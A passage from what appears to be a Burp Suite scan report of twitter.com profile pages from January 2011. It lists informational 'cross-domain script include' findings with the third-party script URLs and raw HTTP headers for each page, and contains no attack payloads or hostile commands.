<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.378. http://twitter.com/THE_REAL_SHAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/THE_REAL_SHAQ

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415
http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415
http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:44:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265476-22093-12798
ETag: "2292bad8ff862731407148084ee7d5a9"
Last-Modified: Sat, 29 Jan 2011 01:44:36 GMT
X-Runtime: 0.00794
Content-Type: text/html; charset=utf-8
Content-Length: 49010
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.379. http://twitter.com/TV38Boston previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TV38Boston

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955
http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955
http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955
http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955
http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266035-61347-31781
ETag: "44a74d1afcf9bd83d65e21c61083ec35"
Last-Modified: Sat, 29 Jan 2011 01:53:55 GMT
X-Runtime: 0.01014
Content-Type: text/html; charset=utf-8
Content-Length: 19747
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.380. http://twitter.com/TechCrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TechCrunch

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225040-62897-59906
ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a"
Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT
X-Runtime: 0.00806
Content-Type: text/html; charset=utf-8
Content-Length: 54066
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.381. http://twitter.com/TechCrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TechCrunch

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234692-53339-28680
ETag: "7e0533a99283edc3093efb8a08ad5e79"
Last-Modified: Fri, 28 Jan 2011 17:11:32 GMT
X-Runtime: 0.00986
Content-Type: text/html; charset=utf-8
Content-Length: 54742
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.382. http://twitter.com/TheKateBosworth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/TheKateBosworth

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248
http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265833-80143-41969
ETag: "2e949d88eb257784b5bf1e7f6b09ebc5"
Last-Modified: Sat, 29 Jan 2011 01:50:33 GMT
X-Runtime: 0.01545
Content-Type: text/html; charset=utf-8
Content-Length: 27140
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.383. http://twitter.com/Trackgals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Trackgals

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534
http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534
http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265994-35762-9331
ETag: "084cf3c9b164746f0254081f5cf026a3"
Last-Modified: Sat, 29 Jan 2011 01:53:14 GMT
X-Runtime: 0.00950
Content-Type: text/html; charset=utf-8
Content-Length: 52317
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296262534" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296262534" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296262534" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296262534" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296262534" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/dismissable.js?1296262534" type="text/javascript"></script>
...[SNIP]...

18.384. http://twitter.com/Trackgals/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Trackgals/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-91506-33293
ETag: "1be6fcf55b971925b5829f3dff23d7be"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00823
Content-Type: text/html; charset=utf-8
Content-Length: 52701
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.385. http://twitter.com/_juliannemoore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/_juliannemoore

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-32409-42560
ETag: "1befeb7740b62870da7fe07d809fb4d6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.01153
Content-Type: text/html; charset=utf-8
Content-Length: 34492
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
